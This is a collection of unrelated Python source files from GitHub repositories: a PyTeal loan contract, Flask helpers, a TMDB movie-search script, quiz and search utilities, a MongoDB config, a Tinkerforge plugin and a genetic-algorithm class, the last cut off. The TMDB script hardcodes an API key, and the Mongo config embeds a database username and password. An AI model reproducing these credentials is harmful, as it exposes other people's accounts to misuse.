+{"seq_id":"20350174085","text":"from pyteal import *\nfrom pyteal.ast.bytes import Bytes\nfrom pyteal_helpers import program\n\n\ndef approval():\n # globals\n balance = Bytes(\"balance\")\n start_date = Bytes(\"start_date\")\n end_date = Bytes(\"end_date\")\n interest_rate = Bytes(\"interest_rate\")\n loan_amount = Bytes(\"loan_amount\")\n beneficiary_address = Bytes(\"beneficiary\")\n beneficiary_stake = Bytes(\"beneficiary_stake\")\n reserve_address = Bytes(\"reserve_address\")\n # admin_address = Bytes(\"admin_address\")\n agent_address = Bytes(\"agent_address\")\n assetId = Bytes(\"assetId\")\n pool_address = Bytes(\"pool_address\")\n staked_tokens = Bytes(\"staked_tokens\")\n\n # scratch_space\n\n accounts_length = ScratchVar(TealType.uint64)\n backers_length = ScratchVar(TealType.uint64)\n\n\n # finished, needs testing\n @Subroutine(TealType.uint64)\n def check_txn_conditions(idx:Expr):\n return Seq(\n # program.check_rekey_zero()\n \n And(\n Gtxn[idx].type_enum() == TxnType.AssetTransfer,\n # App.optedIn(transaction.asset_sender(), Global.current_application_id()),\n Gtxn[idx].asset_receiver() == Global.current_application_address(),\n Gtxn[idx].asset_close_to() == Global.zero_address(),\n )\n \n )\n\n # Incomplete, needs testing\n @Subroutine(TealType.uint64)\n def pre_assertions():\n idx = ScratchVar(TealType.uint64)\n backer_end_idx = 
ScratchVar(TealType.uint64)\n return Seq(\n Assert(\n And(\n Global.group_size() > Int(2),\n Gtxn[1].asset_amount() > Int(1),\n\n )\n ),\n\n accounts_length.store(Global.group_size()),\n App.globalPut(beneficiary_stake, Gtxn[0].asset_amount()),\n App.globalPut(beneficiary_address, Gtxn[0].asset_sender()), \n backer_end_idx.store(accounts_length.load()),\n If(check_txn_conditions(Int(0)) == Int(0))\n .Then(\n Seq( \n For(idx.store(Int(4)), idx.load() <= backer_end_idx.load(), idx.store(idx.load() + Int(1)))\n .Do( \n If(check_txn_conditions(idx.load()) == Int(0))\n .Then(\n # tally the staked tokens,\n Seq(\n App.globalPut(staked_tokens, App.globalGet(Bytes(\"staked_tokens\")) + Gtxn[idx.load()].asset_amount()),\n Continue()\n )\n )\n .Else(\n Seq(\n Reject()\n )\n \n )\n \n ),\n # check if points match loan amount\n If(App.globalGet(Bytes(\"staked_tokens\")) != App.globalGet(Bytes(\"loan_amount\")))\n .Then(\n Seq(\n Return(Int(0))\n )),\n\n Return(Int(1))\n )\n\n \n )\n .Else(\n Return(Int(0))\n )\n )\n\n\n\n @Subroutine(TealType.none)\n def payment():\n return Seq(\n # run custom logic\n #TODO:: Check if agent address has the required amount\n #make sure balance doesnt go below zero\n Assert(Btoi(Txn.application_args[1]) <= App.globalGet(balance)),\n #move USDCa from agent to pool address\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields(\n {\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.asset_receiver: App.globalGet(Bytes(\"pool_address\")),\n TxnField.asset_amount: Btoi(Txn.application_args[1]), #amount\n TxnField.xfer_asset: Txn.assets[0],\n TxnField.asset_sender: Txn.sender() #agent address\n }\n ),\n InnerTxnBuilder.Submit(),\n #reduce balance\n App.globalPut(Bytes(\"balance\"), App.globalGet(Bytes(\"balance\")) - Btoi(Txn.application_args[1])),\n )\n\n # expressions\n force_close = Seq(\n # run custom logic\n Approve(),\n )\n\n register_agent = Seq(\n # App.globalPut(agent_address, Txn.accounts[1]),\n Approve()\n )\n\n \n check_default = Seq(\n # run custom logic\n Approve(),\n )\n\n handle_creation = Seq(\n #TODO: CHECK if args are valid\n\n App.globalPut(loan_amount, Txn.application_args[1]),\n App.globalPut(interest_rate, Txn.application_args[2]),\n App.globalPut(start_date, Txn.application_args[3]),\n App.globalPut(end_date, Txn.application_args[4]),\n App.globalPut(reserve_address, Txn.application_args[5]),\n App.globalPut(pool_address, Txn.application_args[6]),\n # App.globalPut(assetId, \"get assettid from --foreign-asset arg\"),\n\n Approve()\n )\n\n #needs testing\n @Subroutine(TealType.none)\n def initialize_loan():\n return Seq(\n If(pre_assertions() == Int(1))\n .Then(\n Seq(\n Reject()\n )\n ),\n #update loan balance\n App.globalPut(balance, App.globalGet(Bytes(\"loan_amount\"))+ (App.globalGet(Bytes(\"loan_amount\")) * (App.globalGet(Bytes(\"interest_rate\"))/Int(100)))),\n # move USDCa to agent address\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields(\n {\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.asset_receiver: App.globalGet(Bytes(\"agent_address\")),\n TxnField.asset_amount: App.globalGet(Bytes(\"loan_amount\")),\n TxnField.xfer_asset: Txn.assets[0],\n TxnField.asset_sender: App.globalGet(Bytes(\"pool_address\"))\n }\n ),\n InnerTxnBuilder.Submit(),\n\n # Approve()\n )\n \n \n\n return program.event(\n init=handle_creation,\n opt_in=Seq(\n Cond(\n [Txn.application_args[0] == Bytes(\"register_agent\"), register_agent],\n ),\n Approve()\n ),\n\n no_op=Seq(\n Cond(\n [Txn.application_args[0] == Bytes(\"apply\"), initialize_loan()],\n 
[Txn.application_args[0] == Bytes(\"payment\"), payment()],\n [Txn.application_args[0] == Bytes(\"force_close\"), force_close],\n [Txn.application_args[0] == Bytes(\"check_default\"), check_default]\n ),\n Reject()\n )\n\n )\n\n\ndef clear():\n return Approve()\n","repo_name":"africacodeacademy/fidelis-contracts-pyteal","sub_path":"contracts/loans/loan1.py","file_name":"loan1.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2554882497","text":"from functools import wraps\n\nfrom flask import jsonify, request, session, g\nfrom marshmallow import Schema,fields\nfrom peo.models.account import Account\nfrom werkzeug.wrappers import Response\n\n\ndef get_error_resp(exc_dict):\n return jsonify(exc_dict), exc_dict[\"status\"]\n\n\ndef process_request(f, *args, input_schema=None, output_schema=None, **kwargs):\n if input_schema:\n failure = {\n \"message\": \"Bad request\",\n \"status\": 400,\n }\n error = False\n content = request.get_json(silent=False, force=True)\n req, errors = input_schema.load(content)\n if req is None or errors:\n failure[\"errors\"] = errors\n return get_error_resp(failure)\n resp = f(req, *args, **kwargs)\n else:\n resp = f(*args, **kwargs)\n if isinstance(resp, Response):\n return resp\n body, status = resp\n if output_schema:\n body, errors = output_schema.dump(body)\n if errors:\n return get_error_resp({\n \"message\": \"Marshal error\",\n \"status\": 500,\n \"errors\": errors\n })\n\n return jsonify(body), status\n\n\ndef validate(input_schema=None, output_schema=None):\n def decor(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n return process_request(\n f, *args, input_schema=input_schema, output_schema=output_schema, **kwargs)\n return wrap\n return decor\n\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'uid' in session:\n return f(*args, **kwargs)\n raise Account.Unauthorized\n return wrap\n\n\ndef with_common_errors(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Account.Unauthorized:\n return get_error_resp({\n \"message\": \"Unauthorized\",\n \"status\": 401\n })\n return wrap\n","repo_name":"ostapsteam/peo","sub_path":"peo/blueprints/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1930235085","text":"import requests\n\ndef test():\n\treq = requests.get(\"https://api.themoviedb.org/3/movie/76341?api_key=fb3d514ef28708534a2c617322cacaf1&language=en\")\n\tprint(req.text)\n\ndef SearchMovie(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/movie?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = req.json()\n\tfor item in results[\"results\"]:\n\t\tprint(item[\"original_title\"],item[\"release_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"])\n\t# print(req.text)\n\ndef SearchTV(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/tv?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = req.json()\n\t# print(results)\n\tfor item in results[\"results\"]:\n\t\tprint(item[\"original_name\"],item[\"first_air_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"],item[\"origin_country\"])\n\ndef SearchMulti(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/multi?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = 
req.json()\n\t# print(results)\n\tfor item in results[\"results\"]:\n\t\tprint(item)\n\ndef GetTrending(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/trending/all/week?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\tresults = req.json()\n\t# print(results)\n\tfor item in results[\"results\"]:\n\t\t# print(item)\n\t\tif query != \"\" and query not in genresInverse:\n\t\t\tprint(\"Not a valid genre!\")\n\t\t\tbreak\n\t\tif query != \"\" and genresInverse.get(query,\"\") not in item[\"genre_ids\"]:\n\t\t\tcontinue\n\t\tif (item[\"media_type\"] == \"movie\"):\n\t\t\tprint(item[\"title\"],item[\"release_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"],item[\"media_type\"])\n\t\t\t# for genre in item[\"genre_ids\"]:\n\t\t\t# \tprint(genres[genre])\n\t\telse:\n\t\t\tprint(item[\"name\"],item[\"first_air_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"],item[\"media_type\"])\n\ndef GetGenres():\n\treq = requests.get(\"https://api.themoviedb.org/3/genre/movie/list?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\t# print(req.text)\n\tgenres_list = req.json()[\"genres\"]\n\tfor genre in genres_list:\n\t\tgenres[genre[\"id\"]] = genre[\"name\"].lower()\n\t\tgenresInverse[genre[\"name\"].lower()] = genre[\"id\"]\n\tprint(genres)\n\ndef GetWatchProvidersRegion():\n\treq = requests.get(\"https://api.themoviedb.org/3/watch/providers/regions?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\tprint(req.text)\n\ndef GetWatchProvidersMovie():\n\treq = requests.get(\"https://api.themoviedb.org/3/watch/providers/movie?api_key=fb3d514ef28708534a2c617322cacaf1&watch_region=CZ\")\n\tprint(req.text)\n\ndef GetWatchProvidersTV():\n\treq = requests.get(\"https://api.themoviedb.org/3/watch/providers/tv?api_key=fb3d514ef28708534a2c617322cacaf1&wath_region=CZ\")\n\tprint(req.text)\n\ndef DiscoverMovie():\n\treq = requests.get(\"https://api.themoviedb.org/3/discover/movie?api_key=fb3d514ef28708534a2c617322cacaf1&sort_by=popularity.desc\")\n\tresults = req.json()\n\tprint(results)\n\ndef GetRecommendations(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/movie?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = req.json()[\"results\"]\n\tmovie_id = results[0][\"id\"]\n\treq = requests.get(\"https://api.themoviedb.org/3/movie/\" + str(movie_id) +\"/recommendations?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\tresults = req.json()[\"results\"]\n\t# print(results)\n\tfor item in results:\n\t\tprint(item[\"original_title\"],item[\"release_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"])\n\ngenres = {}\ngenresInverse = {}\n\nif __name__ == \"__main__\":\n\t# SearchMovie(input(\"Search for: \"))\n\t# SearchTV(input(\"Search for: \"))\n\t# SearchMulti(input(\"Search for: \"))\n\tGetGenres()\n\t# GetWatchProvidersRegion()\n\t# GetWatchProvidersMovie()\n\t# GetWatchProvidersTV()\n\t# GetTrending(input(\"Search for: \").lower())\n\t# DiscoverMovie()\n\tGetRecommendations(input(\"Search for: \"))\n\tinput()\n\n\n# Add discover movies\n# Add Movie Recommendations","repo_name":"fajtak/fun-tmbdAPI","sub_path":"tmbd.py","file_name":"tmbd.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39475487583","text":"x=int(input(\"Ingrese un numero entero\"))\r\nif x <0:\r\n x=0\r\n print('Negativo cambiado a cero')\r\nelif x ==0:\r\n print('Cero')\r\nelif x ==1:\r\n print('Uno')\r\nelse:\r\n print('Ninguna opcion')\r\n 
\r\n","repo_name":"asolisn/-ejercicios-de-python","sub_path":"ejercicios de python/ejercicio 6.py","file_name":"ejercicio 6.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74169359845","text":"import json\nimport requests\nimport os\n\ndef set_google_search_request_parameters(search_query):\n \"\"\"To Set up the request parameters for GET Query\"\"\"\n params = {}\n params['key'] = os.environ.get('discordapp_google_key')\n params['cx'] = os.environ.get('discordapp_google_cx')\n params['q'] = search_query\n return params\n\ndef find_google_results(search_query):\n \"\"\" To find the google results for a particular string and format the results\"\"\"\n URL = 'https://www.googleapis.com/customsearch/v1'\n params = set_google_search_request_parameters(search_query)\n result_data = requests.get(URL,params = params).content\n result_data_dict = json.loads(result_data)\n formatted_data = \"Here the following search results from GOOGLE! \\n\\n\"\n for item in result_data_dict['items'][:5]:\n formatted_data += f\"{item['title']} \\nURL : {item['link']} \\n\\n\"\n return formatted_data\n","repo_name":"gauravarora011/discord_bot","sub_path":"search_results.py","file_name":"search_results.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41312493957","text":"from PyQt5 import Qt, QtGui, QtCore\nfrom PyQt5.QtWidgets import QMessageBox\n\nfrom ..util import LabelInfo\nfrom ..plugin_base import PluginBase\nfrom ..tinkerforge.bricklet_distance_ir_v2 import BrickletDistanceIRV2\nfrom ..tinkerforge.bricklet_e_paper_296x128 import BrickletEPaper296x128\n\nimport traceback\n\nclass Plugin(PluginBase):\n TODO_TEXT = u\"\"\"\\\n1. Verbinde fertiges Bricklet mit Master Brick 3.0\n2. 
Etikett wird automatisch gedruckt\n\"\"\"\n\n def start(self):\n self.mw.button_flash.setEnabled(False)\n self.mw.check_print_label.show()\n self.mw.button_continue.hide()\n PluginBase.start(self)\n self.show_device_information(None, clear_value=True)\n\n def show_device_information(self, device_information, clear_value=False):\n if device_information != None:\n self.mw.set_tool_status_okay(\"Plugin gefunden\")\n\n if device_information.uid in ['1', '7xwQ9g']:\n self.mw.set_uid_status_error(\"Aktuelle UID \" + device_information.uid + \" ist ungültig\")\n else:\n self.mw.set_uid_status_okay(\"Aktuelle UID lautet \" + device_information.uid)\n\n self.mw.set_flash_status_okay(\"Aktuelle Firmware Version lautet \" + '.'.join([str(fw) for fw in device_information.firmware_version]))\n else:\n self.mw.set_tool_status_normal(\"Kein Plugin gefunden\")\n self.mw.set_uid_status_normal('-')\n self.mw.set_flash_status_normal('-')\n\n if clear_value:\n self.mw.set_value_normal('-')\n\n def handles_device_identifier(self, device_identifier):\n return str(device_identifier).startswith('2')\n\n def new_enum(self, device_information):\n self.show_device_information(device_information)\n\n if self.mw.check_print_label.isChecked():\n sku = device_information.device_identifier\n\n if sku == BrickletDistanceIRV2.DEVICE_IDENTIFIER:\n sensor_type = BrickletDistanceIRV2(device_information.uid, self.get_ipcon()).get_sensor_type()\n\n if sensor_type == 0:\n sku = 2125 # 4-30cm\n elif sensor_type == 1:\n sku = 2142 # 10-80cm\n elif sensor_type == 2:\n sku = 2143 # 20-150cm\n else:\n QMessageBox.critical(self.mw, 'Distance IR Bricklet 2.0', 'Unbekannter Sharp Distanz-Sensor: {0}'.format(sensor_type))\n return\n\n elif sku == BrickletEPaper296x128.DEVICE_IDENTIFIER:\n color = BrickletEPaper296x128(device_information.uid, self.get_ipcon()).get_display_type()\n\n if color == 0:\n sku = 2146 # red\n elif color == 1:\n sku = 2148 # gray\n else:\n QMessageBox.critical(self.mw, 'E-Paper 296x128 Bricklet', 'Unbekannte Farbe: {0}'.format(color))\n return\n\n self.mw.print_label(LabelInfo(sku, device_information.uid, device_information.firmware_version, device_information.hardware_version))\n","repo_name":"Tinkerforge/flash-test","sub_path":"src/flash-test/plugin_system/plugins/label_bricklet.py","file_name":"label_bricklet.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22763055757","text":"from colorama import Fore\nfrom QUESTION_FUNNY import FUNNY_QUESTIONS\nclass TRICKY_QUESTIONS(FUNNY_QUESTIONS):\n\n def Tricky_Q(self):\n\n cursor = self.Bridge.cursor()\n z = 'SELECT Question,Answer FROM dbo.Tricky_Questions'\n cursor.execute(z)\n score = 0\n for i in cursor:\n print(i[0])\n Answer = input(Fore.LIGHTMAGENTA_EX + \"enter the answer: \" + Fore.RESET)\n if Answer == i[1]:\n score += 1\n print(Fore.LIGHTGREEN_EX + \"Correct\" + Fore.RESET)\n else:\n print(Fore.RED + \"FAILED\" + Fore.RESET)\n print(\"Your final score is :\", score, \"/11\")\n print(Fore.RED + \"FOR TO START FIRST FILL YOUR PERSONAL DETAILS!\" + Fore.RESET)\n PersonId = int(input(Fore.LIGHTGREEN_EX + \"enter your id number: \" + Fore.RESET))\n LastName = input(Fore.LIGHTGREEN_EX + \"enter your lastname: \" + Fore.RESET)\n FirstName = input(Fore.LIGHTGREEN_EX + \"enter your firstname: \" + Fore.RESET)\n City = input(Fore.LIGHTGREEN_EX + \"enter your city: \" + Fore.RESET)\n Result = score\n cursor.execute(\n \"INSERT INTO SCHOOL.dbo.Examers(PersonId, 
LastName, FirstName, City, Result) VALUES (?, ?, ?, ?, ?)\",\n (PersonId, LastName, FirstName, City, Result))\n self.Bridge.commit()\n exit()\n","repo_name":"BenelMolla/TRIVIA_GAME","sub_path":"QUESTION_TRICKY.py","file_name":"QUESTION_TRICKY.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72851778085","text":"from flask_mongoengine import MongoEngine\n\nhost = 'mongodb://master:master228@ds125068.mlab.com:25068/heroku_wsvtmzmb?retryWrites=false'\napp_db_config = {\n 'db': 'heroku_wsvtmzmb',\n 'host': host\n }\n\n\ndef init_app(app):\n app.config['MONGODB_SETTINGS'] = app_db_config\n db = MongoEngine(app)\n\n","repo_name":"Frozen-people-club/puton-pompom","sub_path":"flask_backend/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24889390471","text":"#\n# This package implements a genetic algorithm for selection hyper-heuristics.\n# Nelishia Pillay\n# 27 August 2016\n# \n\n# Import statements\nfrom random import Random\nfrom typing import List\n\n#\n# This class implements a genetic algorithm selection hyper-heuristic\n# hyper-heuristic for selecting low-level constructive or perturbative\n# heuristics for a problem domain.\n#\nfrom GeneticAlgorithm.Solution import Solution\nfrom GeneticAlgorithm.Problem import Problem\n\nimport torch\nfrom NeuralNetwork.DeviceLoader import get_device, to_device, ToDeviceLoader\nfrom NeuralNetwork.Augmentation import trainingAugmentation, testingAugmentation\nfrom torch.utils.data.dataloader import DataLoader\nfrom torchvision.datasets import CIFAR100\n\nfrom os import path\n\nfrom NeuralNetwork.Helper import weights_init, getFeatureMaps, getModelWeights\nfrom NeuralNetwork.Train import train_student, train_model_distill_only\nfrom NeuralNetwork.ResNet import ResNet\nfrom NeuralNetwork.ResidualBlock import ResidualBlock\nfrom NeuralNetwork.Train import train_model, evaluate, train_model_with_distillation\nfrom NeuralNetwork.Print import plot_acc, plot_loss, printFeatureMaps, plot_ga_best, plot_layer_counter\n\n\nclass GeneticAlgorithm(object):\n # Data elements\n # \n # Stores the population size.\n # \n population_size: int\n\n # \n # Stores the tournament size.\n # \n tournament_size: int\n\n # \n # Stores the number of generations.\n # \n no_of_generations: int\n\n # \n # Stores the mutation application rate.\n # \n mutation_rate: float\n\n # \n # Stores the crossover application rate.\n # \n crossover_rate: float\n\n # \n # Stores the reproduction application rate.\n # \n reproduction_rate: float\n\n # \n # Stores the length of the string created by mutation to insert into the\n # selected parent.The length of the string is randomly selected between 1 and t\n # the this limit.\n # \n mutation_length: int\n\n # \n # Stores the maximum length for the chromosomes create in the initial\n # population.\n # \n initial_max_length: int\n\n # \n # Stores the maximum length or the chromosomes produced by the genetic\n # operators.\n # \n offspring_max_length: int\n\n # \n # Stores a Boolean value indicating whether duplicates should be allowed in the\n # initial population or not.The default value is false.\n # \n allow_duplicates: bool\n\n # \n # Stores a character for each problem specific heuristic.For example, \"lse\",\n # in which case there are three problem specific heuristics,represented by\n # \"l\", 
\"s\" and \"e\" respectively.\n # \n heuristics: str\n\n # \n # This variable stores a problem domain instance.\n # \n problem: Problem\n\n # \n # Stores and instances of the random number generator to be used by the genetic\n # algorithm.\n # \n ranGen: Random\n\n # \n # Stores the population.Each element is an instance of type InitialSolution.This\n # instance stores the heuristic combination, fitness and initial solution.\n # \n population: List[Solution]\n\n # \n # Is a flag used to determine whether output for each generation must be\n # printed to the screen or not.If it is set to true output is\n # printed.If it is set to false output is not printed.The default is\n # true.\n # \n print_: bool\n\n #\n # This is the constructor for the class.\n #\n # @param seed The seed for the random number generator.\n # @param heuristics A string of characters representing each of the low-level\n # heuristics for the problem domain.\n # \n def __init__(self, seed=123, heuristics='', ran_gen=None):\n if heuristics == '':\n raise ValueError('Heuristics cannot be empty')\n self.heuristics = heuristics\n # Initializes the random number generator.\n if seed == 123 and ran_gen is not None:\n self.ranGen = ran_gen\n else:\n self.ranGen = Random(seed)\n # Set the flag for printing output for each generation to true.\n self.print_ = True\n self.population_size = 0\n self.allow_duplicates = False\n\n # Methods for setting parameter values for the genetic algorithm\n #\n # Reads the parameters from a file and stores them as data element.\n #\n # @param parameterFile The name of the file the parameter values are stored\n # in.\n # \n def set_parameters(self, parameter_file):\n try:\n # Initialise input stream to read from a file\n with open(parameter_file, 'r') as f:\n self.population_size = int(f.readline())\n self.tournament_size = int(f.readline())\n self.no_of_generations = int(f.readline())\n self.mutation_rate = float(f.readline())\n self.crossover_rate = float(f.readline())\n self.initial_max_length = int(f.readline())\n self.offspring_max_length = int(f.readline())\n self.mutation_length = int(f.readline())\n\n print(\"Population size: \" + str(self.population_size))\n print(\"Tournament size: \" + str(self.tournament_size))\n print(\"Number of generations: \" + str(self.no_of_generations))\n print(\"Mutation rate: \" + str(self.mutation_rate))\n print(\"Crossover rate: \" + str(self.crossover_rate))\n print(\"Initial max length: \" + str(self.initial_max_length))\n print(\"Offspring max length: \" + str(self.offspring_max_length))\n print(\"Mutation length: \" + str(self.mutation_length))\n\n except IOError as ioe:\n print(\"The file \" + parameter_file + \" cannot be found. 
\" + \"Please check the details provided.\", ioe)\n\n #\n # Sets the number of generations size.\n #\n # @param noOfGenerations Parameter value for the number of generations.\n # \n def set_no_of_generations(self, no_of_generations):\n self.no_of_generations = no_of_generations\n\n #\n # @return The population size.\n # \n def get_population_size(self):\n return self.population_size\n\n #\n # Sets the population size.\n #\n # @param populationSize Parameter value for the population size.\n # \n def set_population_size(self, population_size):\n self.population_size = population_size\n\n #\n # @return The tournament size.\n # \n def get_tournament_size(self):\n return self.tournament_size\n\n #\n # Sets the tournament size.\n #\n # @param tournamentSize Parameter value for the tournament size.\n # \n def set_tournament_size(self, tournament_size):\n self.tournament_size = tournament_size\n\n #\n # @return Returns the number of generations.\n # \n def get_no_of_generations(self):\n return self.no_of_generations\n\n #\n # @return Returns the mutation rate.\n # \n def get_mutation_rate(self):\n return self.mutation_rate\n\n #\n # Sets the mutation rate.\n #\n # @param mutationRate Parameter value for the mutation rate. The value must be\n # a fraction, e.g. 0.5.\n # \n def set_mutation_rate(self, mutation_rate):\n self.mutation_rate = mutation_rate\n\n #\n # @return Returns the crossover rate.\n # \n def get_crossover_rate(self):\n return self.crossover_rate\n\n #\n # Sets the crossover rate.\n #\n # @param crossoverRate Parameter value for the crossover rate. The value must\n # be a fraction, e.g. 0.5.\n # \n def set_crossover_rate(self, crossover_rate):\n self.crossover_rate = crossover_rate\n\n #\n # @return Returns the reproduction rate.\n # \n def get_reproduction_rate(self):\n return self.reproduction_rate\n\n #\n # @return Returns the initial maximum length permitted for heuristic\n # combinations created in the initial population.\n # \n def get_initial_max_length(self):\n return self.initial_max_length\n\n #\n # Sets the maximum length of chromosome in the initial population.\n #\n # @param initialMaxLength Parameter value specifying the maximum length\n # permitted for heuristic combinations created in the initial population.\n # \n def set_initial_max_length(self, initial_max_length):\n self.initial_max_length = initial_max_length\n\n #\n # @return Returns the maximum offspring length.\n # \n def get_offspring_max_length(self):\n return self.offspring_max_length\n\n #\n # Sets the maximum length of the offspring produced by the genetic operators.If\n # the offspring size exceeds this length the substring equal to this value is\n # returned.\n #\n # @param offspringMaxLength Parameter value specifying the maximum length\n # permitted for offspring created by the mutation and crossover operators.\n # \n def set_offspring_max_length(self, offspring_max_length):\n self.offspring_max_length = offspring_max_length\n\n #\n # @return Returns the mutation length.\n # \n def get_mutation_length(self):\n return self.mutation_length\n\n #\n # Sets the maximum permitted length for the new substring created by mutation\n # to be inserted at a randomly selected point in a copy of the parent.The\n # length of the substring to be inserted is randomly selected to be between 1\n # and the this limit.\n #\n # @param mutationLength Parameter value specifying the mutation length.\n # \n def set_mutation_length(self, mutation_length):\n self.mutation_length = mutation_length\n\n #\n # @return Returns the 
value of the Boolean flag that is used to specify if\n # duplicates are allowed or not.\n # \n def get_allow_duplicates(self):\n return self.allow_duplicates\n\n #\n # This method sets the Boolean flag indicating whether duplicates are allowed\n # in the initial population of not.\n #\n # @param allowDuplicates A value of true or false which indicates whether\n # duplicates are allowed in the initial population or not.\n # \n def set_allow_duplicates(self, allow_duplicates):\n self.allow_duplicates = allow_duplicates\n\n #\n # @return Returns the value of the flag print used to determine whether to\n # print output to the screen.\n # \n def get_print(self):\n return self.print_\n\n #\n # Sets the flag for printing output for each generation to the screen.If it is\n # set to true output is printed.If it is set to false output\n # is not printed.The default is true.The output printed to the screen\n # is the best heuristic combination for each generation and its fitness as well\n # as the best fitness obtained thus far in the run.\n #\n # @param print A value of false or true indicating whether output for each\n # generation must be printed to the screen or not.\n # \n def set_print(self, print_):\n self.print_ = print_\n\n # Methods for setting problem specific information\n #\n # This method sets the string of characters, each representing a low-level\n # heuristic for the problem domain.\n #\n # @param heuristics The string of characters representing the low-level\n # heuristics.\n # \n def set_heuristics(self, heuristics):\n self.heuristics = heuristics\n\n #\n # This method sets the string of characters, each representing a low-level\n # heuristic for the problem domain.\n #\n # @param problem Is an instance of ProblemDomain which defines the\n # problem domain.\n # \n def set_problem(self, problem):\n self.problem = problem\n\n # Methods for creating the initial population\n def exists(self, heuristic_combination, pos):\n # Checks whether the Comb already exists in the population.\n count = 0\n while count < pos:\n if heuristic_combination == self.population[count].get_heuristic_combination():\n return True\n count += 1\n return False\n\n def create_heuristic_combination(self):\n heuristic_combination = ''\n length = self.ranGen.randrange(self.initial_max_length) + 1\n count = 1\n while count <= length:\n heuristic_combination += self.ranGen.choice(self.heuristics)\n count += 1\n return heuristic_combination\n\n def create_population(self, trainingItems) -> Solution:\n best = None\n self.population = []\n count = 0\n while count < self.population_size:\n if not self.allow_duplicates and self.population_size <= len(self.heuristics):\n while True:\n ind = self.create_heuristic_combination()\n if not self.exists(ind, count):\n break\n else:\n ind = self.create_heuristic_combination()\n self.population.append(self.evaluate(ind, trainingItems))\n self.population[count].set_heuristic_combination(ind)\n if count == 0:\n best = self.population[count]\n elif self.population[count].fitter(best) == 1:\n best = self.population[count]\n count += 1\n return best\n\n def display_population(self):\n print(\"Population\")\n for element in self.population:\n print(element.get_heuristic_combination(), element.get_fitness())\n\n def evaluate(self, ind, trainingItems) -> Solution:\n return self.problem.evaluate(ind, trainingItems)\n\n def selection(self) -> Solution:\n winner = self.ranGen.choice(self.population)\n count = 1\n while count < self.tournament_size:\n current = 
self.ranGen.choice(self.population)\n if current.fitter(winner) == 1:\n winner = current\n count += 1\n if self.print_:\n print('winner', winner)\n return winner\n\n def crossover(self, parent1: Solution, parent2: Solution, trainingItems) -> Solution:\n p1 = parent1.get_heuristic_combination()\n p2 = parent2.get_heuristic_combination()\n point1 = self.ranGen.randrange(len(p1))\n point2 = self.ranGen.randrange(len(p2))\n frag11 = p1[:point1]\n frag12 = p1[point1:]\n frag21 = p2[:point2]\n frag22 = p2[point2:]\n os1 = str(frag11 + frag22)\n os2 = str(frag21 + frag12)\n if self.offspring_max_length > 0 and self.offspring_max_length < len(os1):\n os1 = os1[:self.offspring_max_length]\n if self.offspring_max_length > 0 and self.offspring_max_length < len(os2):\n os2 = os2[:self.offspring_max_length]\n offspring1 = self.evaluate(os1, trainingItems)\n offspring1.set_heuristic_combination(os1)\n offspring2 = self.evaluate(os2, trainingItems)\n offspring2.set_heuristic_combination(os2)\n if offspring1.fitter(offspring2) == 1:\n return offspring1\n else:\n return offspring2\n\n def create_string(self, limit):\n str_ = ''\n count = 0\n while count < limit:\n str_ += self.ranGen.choice(self.heuristics)\n count += 1\n return str_\n\n def mutation(self, parent: Solution, trainingItems):\n com = parent.get_heuristic_combination()\n if self.print_:\n print('com', com)\n mutation_point = self.ranGen.randrange(len(com))\n mutation_length = self.ranGen.randrange(self.mutation_length) + 1\n hh = self.create_string(mutation_length)\n begin = com[: mutation_point]\n end = com[mutation_point + 1:]\n tem = begin + hh + end\n if self.offspring_max_length > 0 and self.offspring_max_length < len(tem):\n tem = tem[:self.offspring_max_length]\n offspring = self.evaluate(tem, trainingItems)\n offspring.set_heuristic_combination(tem)\n return offspring\n\n def regenerate(self, best_individual, trainingItems) -> Solution:\n number_of_mutations = int((self.mutation_rate * self.population_size))\n number_of_crossovers = int((self.crossover_rate * self.population_size))\n self.reproduction_rate = 0\n if (self.mutation_rate + 